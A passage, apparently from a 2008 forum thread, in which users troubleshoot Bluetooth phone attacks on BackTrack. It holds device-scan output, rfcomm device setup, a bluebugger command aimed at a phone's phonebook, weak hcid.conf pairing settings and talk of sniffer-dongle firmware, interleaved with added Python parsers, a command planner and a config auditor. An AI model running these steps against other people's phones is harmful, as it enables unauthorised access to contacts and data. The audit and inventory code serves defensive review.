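Browsing 00:11:22:33:44:55 ...
Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
  "Dialup Networking" (0x1103)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 5
  "OBEX" (0x0008)

Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
  "OBEX File Transfer" (0x1106)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 6
  "OBEX" (0x0008)

Service Name: Mouse & Keyboard
Service RecHandle: 0x10009
Service Class ID List:
  "Human Interface Device" (0x1124)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 17
  "HIDP" (0x0011)
"""

MKNOD_LINE = re.compile(r"/dev/rfcomm(?P<idx>\d+)\s+c\s+(?P<major>\d+)\s+(?P<minor>\d+)")


def parse_sdp_browse(text):
    """Return {service_name: rfcomm_channel} for each record that runs over RFCOMM.

    Records are separated by blank lines; nameless records and records without a
    Channel line (L2CAP-only services such as HID) are skipped.
    """
    services = {}
    name = channel = None
    for raw in text.splitlines() + [""]:  # the trailing "" flushes the last record
        line = raw.strip()
        if line.startswith("Service Name:"):
            name = line.split(":", 1)[1].strip()
        elif line.startswith("Channel:"):
            channel = int(line.split(":", 1)[1])
        elif line == "":
            if name is not None and channel is not None:
                services[name] = channel
            name = channel = None
    return services


def plan_rfcomm_setup(services, target_bdaddr, wanted):
    """Emit mknod + rfcomm bind commands, one rfcomm index per wanted service.

    The node minor always equals the rfcomm index, so /dev/rfcommN is the device that
    `rfcomm bind N` configures. Raises KeyError if the phone does not advertise a service.
    """
    commands = []
    for index, service in enumerate(wanted):
        channel = services[service]
        commands.append("mknod -m 666 /dev/rfcomm%d c %d %d" % (index, RFCOMM_MAJOR, index))
        commands.append("rfcomm bind %d %s %d" % (index, target_bdaddr, channel))
    return commands


def mknod_minor_mismatches(mknod_lines):
    """Return mknod lines whose major is not 216 or whose minor differs from the rfcommN index.

    Such a node addresses a different rfcomm device than its name says: a /dev/rfcomm0
    created with minor 1 really opens rfcomm device 1.
    """
    bad = []
    for line in mknod_lines:
        m = MKNOD_LINE.search(line)
        if m and (int(m.group("major")) != RFCOMM_MAJOR
                  or int(m.group("idx")) != int(m.group("minor"))):
            bad.append(line)
    return bad


if __name__ == "__main__":
    svc = parse_sdp_browse(SAMPLE_BROWSE)
    for cmd in plan_rfcomm_setup(svc, "00:11:22:33:44:55", ["Dial-up Networking", "OBEX File Transfer"]):
        print(cmd)
    print("bad nodes:", mknod_minor_mismatches(["mknod -m 666 /dev/rfcomm0 c 216 1"]))
```

Feed it the real `sdptool browse` output and the service names you want (the Phonebook Access or Serial Port record, for instance), then run the printed commands as root; the `rfcomm bind` still needs the phone to accept the connection on that channel, which is where the pairing setup from the hcid.conf steps earlier comes in.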

mahabad1972
08-21-2008, 12:58 PM
Hi, I was trying to Bluetooth-hack my own phone, but when I get to the part where you put the config in /etc/bluetooth/hcid.conf it said permission denied. Can you tell me why?


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: 00:1C:26:E1:FB:60 ACL MTU: 1017:8 SCO MTU: 64:1
UP RUNNING PSCAN
RX bytes:3610 acl:11 sco:0 events:72 errors:0
TX bytes:558 acl:7 sco:0 commands:29 errors:0
Features: 0xff 0xff 0x8f 0xfe 0x9b 0xf9 0x00 0x80
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy: RSWITCH HOLD SNIFF PARK
Link mode: SLAVE ACCEPT
Name: 'backtrack (0)'
Class: 0x84010c
Service Classes: Rendering, Information
Device Class: Computer, Laptop
HCI Ver: 2.0 (0x3) HCI Rev: 0x213b LMP Ver: 2.0 (0x3) LMP Subver: 0x41d3
Manufacturer: Broadcom Corporation (15)

bt ~ # hcitool scan hci0
Scanning ...
00:1B:EE:39:E6:2E Trixiesmom
00:1E:E2:30:72:F9 John. Is awesome.
00:1F:00:B4:0C:39 Mahabad jino
bt ~ # sdptool browse 00:1F:00:B4:0C:39
Browsing 00:1F:00:B4:0C:39 ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
"AV Remote Target" (0x110c)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 23
"AVCTP" (0x0017)
uint16: 0x100
Profile Descriptor List:
"AV Remote" (0x110e)
Version: 0x0100

Service RecHandle: 0x10001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1

Service Name: Dial-Up Networking
Service RecHandle: 0x10002
Service Class ID List:
"Dialup Networking" (0x1103)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10003
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 9
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: Imaging
Service RecHandle: 0x10005
Service Class ID List:
"Imaging Responder" (0x111b)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 15
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Imaging" (0x111a)
Version: 0x0100

Service Name: Audio Source
Service RecHandle: 0x10007
Service Class ID List:
"Audio Source" (0x110a)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 25
"AVDTP" (0x0019)
uint16: 0x100
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Advanced Audio" (0x110d)
Version: 0x0100

Service Name: Hands-Free Audio Gateway
Service RecHandle: 0x10008
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0105

Service Name: Headset Audio Gateway
Service RecHandle: 0x10009
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: SyncMLClient
Service RecHandle: 0x1000b
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 10
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000002-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x1000c
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 11
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: Nokia OBEX PC Suite Services
Service RecHandle: 0x1000d
Service Class ID List:
UUID 128: 00005005-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 12
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005005-0000-1000-8000-0002ee000001)
Version: 0x0100

Service Name: SyncML DM Client
Service RecHandle: 0x1000e
Service Class ID List:
UUID 128: 00000004-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 13
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00000004-0000-1000-8000-0002ee000002)
Version: 0x0100

Service Name: Nokia SyncML Server
Service RecHandle: 0x10010
Service Class ID List:
UUID 128: 00005601-0000-1000-8000-0002ee000001
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 14
"OBEX" (0x0008)
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"" (0x00005601-0000-1000-8000-0002ee000001)
Version: 0x0100

Service Name: SIM Access
Service RecHandle: 0x10011
Service Class ID List:
"SIM Access" (0x112d)
"Generic Telephony" (0x1204)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
Language Base Attr List:
code_ISO639: 0x454e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"SIM Access" (0x112d)
Version: 0x0101

bt ~ # /etc/bluetooth/hcid.conf
-bash: /etc/bluetooth/hcid.conf: Permission denied
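
The `sdptool browse` listing above is easier to review as an inventory of what the phone exposes and over which transport. The following parser is an added example written for this thread, not the poster's or BlueZ code; its SAMPLE input is constructed from three of the records posted above, and the record layout it assumes is the one sdptool prints in that output.

```python
"""Inventory of services from `sdptool browse` output.

Each record becomes a ServiceRecord so the RFCOMM channels and L2CAP
PSMs a device exposes can be reviewed as one table, including records
that advertise no Service Name at all.
"""
import re
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Tuple

# Constructed sample: three records in the layout sdptool prints.
SAMPLE = """\
Browsing 00:1F:00:B4:0C:39 ...
Service Name: AVRCP Target
Service Description: Audio Video Remote Control
Service Provider: Symbian Software Ltd.
Service RecHandle: 0x10000
Service Class ID List:
  "AV Remote Target" (0x110c)
Protocol Descriptor List:
  "L2CAP" (0x0100)
    PSM: 23
  "AVCTP" (0x0017)
    uint16: 0x100
Profile Descriptor List:
  "AV Remote" (0x110e)
    Version: 0x0100

Service RecHandle: 0x10001
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 1

Service Name: OBEX Object Push
Service RecHandle: 0x10003
Service Class ID List:
  "OBEX Object Push" (0x1105)
Protocol Descriptor List:
  "L2CAP" (0x0100)
  "RFCOMM" (0x0003)
    Channel: 9
  "OBEX" (0x0008)
Profile Descriptor List:
  "OBEX Object Push" (0x1105)
    Version: 0x0100
"""


@dataclass
class ServiceRecord:
    handle: str
    name: str = ""                       # empty: record advertises no name
    classes: List[Tuple[str, str]] = field(default_factory=list)
    protocols: List[str] = field(default_factory=list)
    rfcomm_channel: Optional[int] = None
    l2cap_psm: Optional[int] = None


SECTION_RE = re.compile(r"^(Service Class ID List|Protocol Descriptor List|"
                        r"Profile Descriptor List|Language Base Attr List):$")
UUID_RE = re.compile(r'^"([^"]*)"\s+\((0x[0-9a-fA-F]+)\)$')


def _parse_record(chunk: str) -> Optional[ServiceRecord]:
    """Parse one blank-line-delimited record; None if it has no RecHandle."""
    rec = ServiceRecord(handle="")
    section = None
    for raw in chunk.splitlines():
        line = raw.strip()
        if not line or line.startswith("Browsing "):
            continue
        if line.startswith("Service Name:"):
            rec.name = line.split(":", 1)[1].strip()
        elif line.startswith("Service RecHandle:"):
            rec.handle = line.split(":", 1)[1].strip()
        elif SECTION_RE.match(line):
            section = line[:-1]
        elif line.startswith("Service "):      # Description / Provider lines
            section = None
        elif section == "Service Class ID List":
            m = UUID_RE.match(line)
            if m:
                rec.classes.append((m.group(1), m.group(2)))
            elif line.startswith("UUID 128:"):  # vendor-specific 128-bit class
                rec.classes.append(("", line.split(":", 1)[1].strip()))
        elif section == "Protocol Descriptor List":
            m = UUID_RE.match(line)
            if m:
                rec.protocols.append(m.group(1))
            elif line.startswith("Channel:"):
                rec.rfcomm_channel = int(line.split(":", 1)[1])
            elif line.startswith("PSM:"):
                rec.l2cap_psm = int(line.split(":", 1)[1])
    return rec if rec.handle else None


def parse_sdptool(text: str) -> List[ServiceRecord]:
    """Split browse output on blank lines: one chunk per service record."""
    records = []
    for chunk in re.split(r"\n\s*\n", text):
        rec = _parse_record(chunk)
        if rec:
            records.append(rec)
    return records


def rfcomm_map(records: List[ServiceRecord]) -> Dict[int, str]:
    """RFCOMM channel -> service name; unnamed records are named by handle."""
    out: Dict[int, str] = {}
    for r in records:
        if r.rfcomm_channel is not None:
            out[r.rfcomm_channel] = r.name or f"<unnamed {r.handle}>"
    return out


def report(text: str) -> List[str]:
    """One line per record: handle, name, transport, protocol stack."""
    lines = []
    for r in parse_sdptool(text):
        where = (f"RFCOMM ch {r.rfcomm_channel}" if r.rfcomm_channel is not None
                 else f"L2CAP PSM {r.l2cap_psm}" if r.l2cap_psm is not None
                 else "no transport")
        lines.append(f"{r.handle}  {r.name or '<unnamed>':<22} {where:<14} "
                     f"{'/'.join(r.protocols)}")
    return lines


if __name__ == "__main__":
    print("\n".join(report(SAMPLE)))
```

Unnamed records that still bind an RFCOMM channel (handle 0x10001 above) are worth a second look, since nothing in the listing says what service answers there.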

imported_=Tron=
08-21-2008, 01:01 PM
bt ~ # /etc/bluetooth/hcid.conf
-bash: /etc/bluetooth/hcid.conf: Permission denied

Try specifying the program to use to edit the .conf file, for example nano /etc/bluetooth/hcid.conf or kwrite /etc/bluetooth/hcid.conf. You could also consider editing out all the additional output in your post since it is in no way relevant to your actual problem. ;)

mahabad1972
08-21-2008, 01:13 PM
What am I supposed to edit? Is there any manual or advice? This is what comes up when I put in nano /etc/bluetooth/hcid.conf



# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security user;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "backtrack";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id


#iscan enable;
pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;

imported_=Tron=
08-21-2008, 01:18 PM
What am I supposed to edit? Is there any manual or advice? This is what comes up when I put in nano /etc/bluetooth/hcid.conf

Re-read the very first post of this thread as it is clearly stated what you are supposed to edit in the hcid.conf file.

open /etc/bluetooth/hcid.conf and replace the lot with this

arisdim
08-22-2008, 06:01 AM
Can someone explain to me why I get the "Cannot open '/dev/rfcomm0': Connection refused" message at the end?


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: AA:AA:AA:AA:AA:AA ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # sdptool browse 00:11:22:33:44:55
Browsing 00:11:22:33:44:55 ...
Service Description: Sony Ericsson K750
Service RecHandle: 0x10000
Service Class ID List:
"PnP Information" (0x1200)

Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
"Dialup Networking" (0x1103)
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2

Service Name: HF Voice Gateway
Service RecHandle: 0x10003
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0101

Service Name: HS Voice Gateway
Service RecHandle: 0x10004
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: OBEX SyncML Client
Service RecHandle: 0x10007
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)

Service Name: OBEX IrMC Sync Server
Service RecHandle: 0x10008
Service Class ID List:
"IrMC Sync" (0x1104)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
"OBEX" (0x0008)
Profile Descriptor List:
"IrMC Sync" (0x1104)
Version: 0x0100

Service Name: Mouse & Keyboard
Service Description: Remote Control
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Human Interface Device" (0x1124)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 17
"HIDP" (0x0011)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Human Interface Device" (0x1124)
Version: 0x0100

bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 1
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 5
bt ~ # sdptool add --channel=1 DUN
bt ~ # sdptool add --channel=6 FTP
bt ~ # sdptool add --channel=5 OPUSH
bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # bluebugger -m as -a 00:11:22:33:44:55 phonebook

bluebugger 0.1 ( MaJoMu | w ww.codito.de )
-----------------------------------------

Target Device: '00:11:22:33:44:55'
Target Name: 'K750i'

Cannot open '/dev/rfcomm0': Connection refused


I have changed /etc/bluetooth/hcid.conf to this:

#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
lp rswitch,hold,sniff,park;
auth enable;
encrypt enable;
}
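
As an added example (not part of the post or of BlueZ), the following script reads an hcid.conf like the one above and flags the combination of settings it enables: `security auto` with a stored `passkey`, `pairing multi`, `iscan enable` and `lm accept` together let any nearby device pair and connect with the default PIN and nobody at the keyboard confirming. WEAK is constructed from the posted file, HARDENED is a constructed counterpart, the setting meanings are taken from the file's own comments, and the list of weak PINs is an assumption.

```python
"""Audit a BlueZ hcid.conf for the settings this thread toggles."""
import re
from typing import Dict, List

# Constructed from the configuration posted above (comments abbreviated).
WEAK = """\
# HCI daemon configuration file.
options {
    autoinit yes;
    security auto;        # Use local PIN for incoming connections
    pairing multi;        # Allow pairing with already paired devices
    passkey "1234";       # Default PIN code for incoming connections
}
device {
    name "device1";
    class 0x000000;
    iscan enable; pscan enable;
    lm accept,master;
    lp rswitch,hold,sniff,park;
    auth enable;
    encrypt enable;
}
"""

# Constructed counterpart: a person confirms every pairing, one pairing
# per peer, and the adapter answers pages from known peers only.
HARDENED = """\
options {
    autoinit yes;
    security user;        # Always ask user for a PIN
    pairing once;         # Pair once and deny successive attempts
}
device {
    name "%h-%d";
    iscan disable; pscan enable;   # connectable, not discoverable
    lm master;
    lp rswitch,hold,sniff,park;
    auth enable;
    encrypt enable;
}
"""

# Assumption: PINs that appear as published defaults in tutorials.
WEAK_PINS = {"0000", "1111", "1234", "backtrack"}


def parse_hcid_conf(text: str) -> Dict[str, Dict[str, str]]:
    """Return {block: {keyword: value}} with comments and quotes removed."""
    code = "\n".join(line.split("#", 1)[0] for line in text.splitlines())
    blocks: Dict[str, Dict[str, str]] = {}
    for m in re.finditer(r"(\w+)\s*\{([^}]*)\}", code):
        settings: Dict[str, str] = {}
        for stmt in m.group(2).split(";"):      # handles "a x; b y;" on one line
            stmt = stmt.strip()
            if not stmt:
                continue
            key, _, value = stmt.partition(" ")
            settings[key] = value.strip().strip('"')
        blocks[m.group(1)] = settings
    return blocks


def audit_hcid_conf(text: str) -> List[str]:
    """List the settings that weaken incoming-connection handling."""
    cfg = parse_hcid_conf(text)
    opts, dev = cfg.get("options", {}), cfg.get("device", {})
    findings: List[str] = []
    sec = opts.get("security", "")
    if sec == "none":
        findings.append("security none: security manager disabled")
    elif sec == "auto":
        findings.append("security auto: incoming pairing is answered with the "
                        "stored passkey, nobody is asked")
    pin = opts.get("passkey", "")
    if pin and (pin.lower() in WEAK_PINS or pin.isdigit() and len(pin) <= 4):
        findings.append(f"passkey {pin!r}: default or 4-digit PIN")
    if opts.get("pairing") == "multi":
        findings.append("pairing multi: repeated pairing attempts are allowed")
    if dev.get("iscan") == "enable":
        findings.append("iscan enable: adapter answers inquiries (discoverable)")
    if "accept" in dev.get("lm", "").split(","):
        findings.append("lm accept: always accept incoming connections")
    for knob in ("auth", "encrypt"):
        if dev.get(knob) != "enable":
            findings.append(f"{knob} not enabled")
    return findings


if __name__ == "__main__":
    for label, conf in (("WEAK", WEAK), ("HARDENED", HARDENED)):
        print(label, audit_hcid_conf(conf) or ["no findings"])
```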

aghaster
08-29-2008, 11:47 PM
Hi,

I've bought a DBT-120 Rev C1 on ebay. I've booted on Backtrack3 and followed DrGreen's instructions on how to modify the vendor ID and then flash the firmware on the dongle. It now says I have raw access. However, it looks like I missed the point about needing a second dongle for scanning purposes. I have a broadcom dongle that I use for my bluetooth keyboard, could I just use that one along with my sniffer?

Also, what tools should I try to use for sniffing using my new bluetooth sniffer? I found DrGreen's BlueSmash, and csrsniff.c. Thanks

bestia
09-08-2008, 09:01 AM
Can someone explain to me why I get the "Cannot open '/dev/rfcomm0': Connection refused" message at the end?


bt ~ # hciconfig hci0 up
bt ~ # hciconfig -a
hci0: Type: USB
BD Address: AA:AA:AA:AA:AA:AA ACL MTU: 678:8 SCO MTU: 48:10
UP RUNNING
RX bytes:85 acl:0 sco:0 events:9 errors:0
TX bytes:33 acl:0 sco:0 commands:9 errors:0
Features: 0xbf 0xfe 0x8d 0x78 0x08 0x18 0x00 0x00
Packet type: DM1 DM3 DM5 DH1 DH3 DH5 HV1 HV2 HV3
Link policy:
Link mode: SLAVE ACCEPT
Name: 'ISSCBTA'
Class: 0x000000
Service Classes: Unspecified
Device Class: Miscellaneous,
HCI Ver: 1.2 (0x2) HCI Rev: 0x1fe LMP Ver: 1.2 (0x2) LMP Subver: 0x1fe
Manufacturer: Integrated System Solution Corp. (57)

bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # sdptool browse 00:11:22:33:44:55
Browsing 00:11:22:33:44:55 ...
Service Description: Sony Ericsson K750
Service RecHandle: 0x10000
Service Class ID List:
"PnP Information" (0x1200)

Service Name: Dial-up Networking
Service RecHandle: 0x10001
Service Class ID List:
"Dialup Networking" (0x1103)
"Generic Networking" (0x1201)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 1
Profile Descriptor List:
"Dialup Networking" (0x1103)
Version: 0x0100

Service Name: Serial Port
Service RecHandle: 0x10002
Service Class ID List:
"Serial Port" (0x1101)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 2

Service Name: HF Voice Gateway
Service RecHandle: 0x10003
Service Class ID List:
"Handfree Audio Gateway" (0x111f)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 3
Profile Descriptor List:
"Handsfree" (0x111e)
Version: 0x0101

Service Name: HS Voice Gateway
Service RecHandle: 0x10004
Service Class ID List:
"Headset Audio Gateway" (0x1112)
"Generic Audio" (0x1203)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 4
Profile Descriptor List:
"Headset" (0x1108)
Version: 0x0100

Service Name: OBEX Object Push
Service RecHandle: 0x10005
Service Class ID List:
"OBEX Object Push" (0x1105)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 5
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX Object Push" (0x1105)
Version: 0x0100

Service Name: OBEX File Transfer
Service RecHandle: 0x10006
Service Class ID List:
"OBEX File Transfer" (0x1106)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 6
"OBEX" (0x0008)
Profile Descriptor List:
"OBEX File Transfer" (0x1106)
Version: 0x0100

Service Name: OBEX SyncML Client
Service RecHandle: 0x10007
Service Class ID List:
UUID 128: 00000002-0000-1000-8000-0002ee000002
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 7
"OBEX" (0x0008)

Service Name: OBEX IrMC Sync Server
Service RecHandle: 0x10008
Service Class ID List:
"IrMC Sync" (0x1104)
Protocol Descriptor List:
"L2CAP" (0x0100)
"RFCOMM" (0x0003)
Channel: 8
"OBEX" (0x0008)
Profile Descriptor List:
"IrMC Sync" (0x1104)
Version: 0x0100

Service Name: Mouse & Keyboard
Service Description: Remote Control
Service Provider: Sony Ericsson
Service RecHandle: 0x10009
Service Class ID List:
"Human Interface Device" (0x1124)
Protocol Descriptor List:
"L2CAP" (0x0100)
PSM: 17
"HIDP" (0x0011)
Language Base Attr List:
code_ISO639: 0x656e
encoding: 0x6a
base_offset: 0x100
Profile Descriptor List:
"Human Interface Device" (0x1124)
Version: 0x0100

bt ~ # bash /etc/rc.d/rc.bluetooth restart
Stopping Bluetooth subsystem: pand dund rfcomm hidd sdpd hcid.
Starting Bluetooth subsystem: hcid passkeys.
bt ~ # mknod -m 666 /dev/rfcomm0 c 216 1
bt ~ # mknod -m 666 /dev/rfcomm1 c 216 6
bt ~ # mknod -m 666 /dev/rfcomm2 c 216 5
bt ~ # sdptool add --channel=1 DUN
bt ~ # sdptool add --channel=6 FTP
bt ~ # sdptool add --channel=5 OPUSH
bt ~ # hcitool scan hci0
Scanning ...
00:11:22:33:44:55 K750i
bt ~ # bluebugger -m as -a 00:11:22:33:44:55 phonebook

bluebugger 0.1 ( MaJoMu | w ww.codito.de )
-----------------------------------------

Target Device: '00:11:22:33:44:55'
Target Name: 'K750i'

Cannot open '/dev/rfcomm0': Connection refused


I have changed /etc/bluetooth/hcid.conf to this:

#
# HCI daemon configuration file.
#

# HCId options
options {
# Automatically initialize new devices
autoinit yes;

# Security Manager mode
# none - Security manager disabled
# auto - Use local PIN for incoming connections
# user - Always ask user for a PIN
#
security auto;

# Pairing mode
# none - Pairing disabled
# multi - Allow pairing with already paired devices
# once - Pair once and deny successive attempts
pairing multi;

# Default PIN code for incoming connections
passkey "1234";
}

# Default settings for HCI devices
device {
# Local device name
# %d - device id
# %h - host name
name "device1";

# Local device class
class 0x000000;

# Default packet type
#pkt_type DH1,DM1,HV1;

# Inquiry and Page scan
iscan enable; pscan enable;

# Default link mode
# none - no specific policy
# accept - always accept incoming connections
# master - become master on incoming connections,
# deny role switch on outgoing connections
lm accept,master;

# Default link policy
# none - no specific policy
# rswitch - allow role switch
# hold - allow hold mode
# sniff - allow sniff mode
# park - allow park mode
